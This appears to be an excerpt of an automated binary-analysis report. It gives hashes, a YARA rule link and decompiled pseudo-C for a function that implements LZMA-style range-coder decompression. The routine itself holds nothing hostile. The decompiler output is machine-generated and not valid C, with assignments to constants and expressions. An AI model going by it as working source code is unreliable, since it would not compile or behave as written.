String ID:
API String ID:
Opcode ID: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
Instruction ID: ac331763182a67db8ffe8b732b67c8974d54266b30473341b06133cd37c0d4bc
Opcode Fuzzy Hash: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
Instruction Fuzzy Hash: ECA13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040697A Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040697A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BE7))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
